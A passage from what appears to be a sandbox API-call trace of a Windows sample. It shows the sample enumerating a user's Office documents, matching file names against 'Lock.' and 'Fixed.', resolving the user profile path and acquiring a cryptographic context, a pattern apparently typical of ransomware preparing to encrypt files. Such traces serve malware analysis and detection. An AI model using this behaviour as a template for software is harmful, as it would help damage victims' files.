hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.018] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.018] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.019] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.019] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3aadc160, ftCreationTime.dwHighDateTime=0x1d574eb, ftLastAccessTime.dwLowDateTime=0xe2f72c30, ftLastAccessTime.dwHighDateTime=0x1d5a19b, ftLastWriteTime.dwLowDateTime=0xe2f72c30, ftLastWriteTime.dwHighDateTime=0x1d5a19b, nFileSizeHigh=0x0, nFileSizeLow=0xa07d, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="oXBXXG.xlsx", cAlternateFileName="OXBXXG~1.XLS")) returned 1 [0215.019] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.019] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.019] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.019] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.019] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.019] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9d6fa90, ftCreationTime.dwHighDateTime=0x1d59068, ftLastAccessTime.dwLowDateTime=0xb8a31ad0, ftLastAccessTime.dwHighDateTime=0x1d5b4cd, ftLastWriteTime.dwLowDateTime=0xb8a31ad0, ftLastWriteTime.dwHighDateTime=0x1d5b4cd, nFileSizeHigh=0x0, nFileSizeLow=0x17685, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="qf_lD4ykVY6P7.pptx", cAlternateFileName="QF_LD4~1.PPT")) returned 1 [0215.020] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.020] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.020] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.020] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.020] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.020] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39cd50b0, ftCreationTime.dwHighDateTime=0x1d5b39a, ftLastAccessTime.dwLowDateTime=0xe8718a90, ftLastAccessTime.dwHighDateTime=0x1d59956, ftLastWriteTime.dwLowDateTime=0xe8718a90, ftLastWriteTime.dwHighDateTime=0x1d59956, nFileSizeHigh=0x0, nFileSizeLow=0x13fe5, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="RRwZ.xlsx", cAlternateFileName="RRWZ~1.XLS")) returned 1 [0215.020] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.020] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.020] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.020] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.020] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.020] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22b9b4e0, ftCreationTime.dwHighDateTime=0x1d58feb, ftLastAccessTime.dwLowDateTime=0x63d44870, ftLastAccessTime.dwHighDateTime=0x1d5697e, ftLastWriteTime.dwLowDateTime=0x63d44870, ftLastWriteTime.dwHighDateTime=0x1d5697e, nFileSizeHigh=0x0, nFileSizeLow=0x4e15, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="tMLcqE8DzcE8ZL.xlsx", cAlternateFileName="TMLCQE~1.XLS")) returned 1 [0215.020] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.020] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.020] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.020] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.020] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.020] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15d0d200, ftCreationTime.dwHighDateTime=0x1d5d667, ftLastAccessTime.dwLowDateTime=0x5ecd6570, ftLastAccessTime.dwHighDateTime=0x1d5cba1, ftLastWriteTime.dwLowDateTime=0x5ecd6570, ftLastWriteTime.dwHighDateTime=0x1d5cba1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="uhe R_MajVPhj", cAlternateFileName="UHER_M~1")) returned 1 [0215.020] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.020] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.020] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.020] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.020] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.020] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fd8d4f0, ftCreationTime.dwHighDateTime=0x1d5cfda, ftLastAccessTime.dwLowDateTime=0xa8779d00, ftLastAccessTime.dwHighDateTime=0x1d5cf8c, ftLastWriteTime.dwLowDateTime=0xa8779d00, ftLastWriteTime.dwHighDateTime=0x1d5cf8c, nFileSizeHigh=0x0, nFileSizeLow=0x318d, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="wdchYxA7KRrFzTiR.odp", cAlternateFileName="WDCHYX~1.ODP")) returned 1 [0215.020] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.021] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.021] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.021] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.021] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.021] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa27a2b70, ftCreationTime.dwHighDateTime=0x1d55c8c, ftLastAccessTime.dwLowDateTime=0x9a3a18f0, ftLastAccessTime.dwHighDateTime=0x1d5964b, ftLastWriteTime.dwLowDateTime=0x9a3a18f0, ftLastWriteTime.dwHighDateTime=0x1d5964b, nFileSizeHigh=0x0, nFileSizeLow=0x454e, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="wrMr9 Fyz8.docx", cAlternateFileName="WRMR9F~1.DOC")) returned 1 [0215.021] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.021] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.021] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.021] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92262400, ftCreationTime.dwHighDateTime=0x1d5cea0, ftLastAccessTime.dwLowDateTime=0xb656bcb0, ftLastAccessTime.dwHighDateTime=0x1d5d380, ftLastWriteTime.dwLowDateTime=0xb656bcb0, ftLastWriteTime.dwHighDateTime=0x1d5d380, nFileSizeHigh=0x0, nFileSizeLow=0x7a39, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="xocV7C6c.odp", cAlternateFileName="")) returned 1 [0215.021] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7918cd20, ftCreationTime.dwHighDateTime=0x1d58899, ftLastAccessTime.dwLowDateTime=0x8958970, ftLastAccessTime.dwHighDateTime=0x1d558cf, ftLastWriteTime.dwLowDateTime=0x8958970, ftLastWriteTime.dwHighDateTime=0x1d558cf, nFileSizeHigh=0x0, nFileSizeLow=0xf74c, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="XTyOBM6VZ0m.pptx", cAlternateFileName="XTYOBM~1.PPT")) returned 1 [0215.021] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86845f50, ftCreationTime.dwHighDateTime=0x1d5c297, ftLastAccessTime.dwLowDateTime=0x315a7740, ftLastAccessTime.dwHighDateTime=0x1d5cc50, ftLastWriteTime.dwLowDateTime=0x315a7740, ftLastWriteTime.dwHighDateTime=0x1d5cc50, nFileSizeHigh=0x0, nFileSizeLow=0x10984, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="YBBoLDeAtb.docx", cAlternateFileName="YBBOLD~1.DOC")) returned 1 [0215.021] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x282d2360, ftCreationTime.dwHighDateTime=0x1d5d750, ftLastAccessTime.dwLowDateTime=0xa72068e0, ftLastAccessTime.dwHighDateTime=0x1d5ca93, ftLastWriteTime.dwLowDateTime=0xa72068e0, ftLastWriteTime.dwHighDateTime=0x1d5ca93, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="zxF6sHlM0JaF", cAlternateFileName="ZXF6SH~1")) returned 1 [0215.021] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd1ad9f0, ftCreationTime.dwHighDateTime=0x1d56740, ftLastAccessTime.dwLowDateTime=0xdb3b54e0, ftLastAccessTime.dwHighDateTime=0x1d5cd64, ftLastWriteTime.dwLowDateTime=0xdb3b54e0, ftLastWriteTime.dwHighDateTime=0x1d5cd64, nFileSizeHigh=0x0, nFileSizeLow=0x5c0d, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="_wc0ld1_h 9LSGLE.xlsx", cAlternateFileName="_WC0LD~1.XLS")) returned 1 [0215.021] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2af0000, ftCreationTime.dwHighDateTime=0x8cf2b0, ftLastAccessTime.dwLowDateTime=0x2af0000, ftLastAccessTime.dwHighDateTime=0x18, ftLastWriteTime.dwLowDateTime=0x3, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Ƙʦ桰ʪⷾ瞉", cAlternateFileName="踚@鐔ʯ\x8c蘔J㳻@腸J\x8c\x8c㵶@\x8c\x8c藴Ja")) returned 0 [0215.021] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0215.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="23iZdkXXLok6512uz.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3iZdkXXLok6512uz.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iZdkXXLok6512uz.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZdkXXLok6512uz.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dkXXLok6512uz.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kXXLok6512uz.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XXLok6512uz.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XLok6512uz.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Lok6512uz.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ok6512uz.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k6512uz.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6512uz.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="512uz.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="12uz.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2uz.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uz.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="23iZdkXXLok6512uz.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3iZdkXXLok6512uz.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iZdkXXLok6512uz.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZdkXXLok6512uz.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dkXXLok6512uz.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kXXLok6512uz.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XXLok6512uz.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XLok6512uz.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Lok6512uz.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ok6512uz.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k6512uz.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6512uz.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="512uz.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="12uz.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2uz.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uz.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.024] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0215.024] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.024] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.024] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.024] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.024] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0215.024] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/23iZdkXXLok6512uz.docx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd02cd50, ftCreationTime.dwHighDateTime=0x1d596a9, ftLastAccessTime.dwLowDateTime=0x979171f0, ftLastAccessTime.dwHighDateTime=0x1d58707, ftLastWriteTime.dwLowDateTime=0x979171f0, ftLastWriteTime.dwHighDateTime=0x1d58707, nFileSizeHigh=0x0, nFileSizeLow=0x11490, dwReserved0=0x0, dwReserved1=0x0, cFileName="23iZdkXXLok6512uz.docx", cAlternateFileName="23IZDK~1.DOC")) returned 0x9e1db8 [0215.024] FindClose (in: hFindFile=0x9e1db8 | out: hFindFile=0x9e1db8) returned 1 [0215.025] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.025] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.025] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.025] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.025] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0215.025] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0215.025] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0215.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0215.025] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.025] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.025] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0215.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ee0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0215.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0215.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7060, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0215.026] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7be68) returned 1 [0215.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865040 [0215.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0215.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0215.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0215.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0215.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0215.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0215.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0215.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0215.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0215.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0215.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0215.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0215.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0215.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0215.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0215.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0215.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0215.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0215.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0215.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0215.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0215.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0215.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0215.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0215.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0215.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0215.027] HeapFree (in: 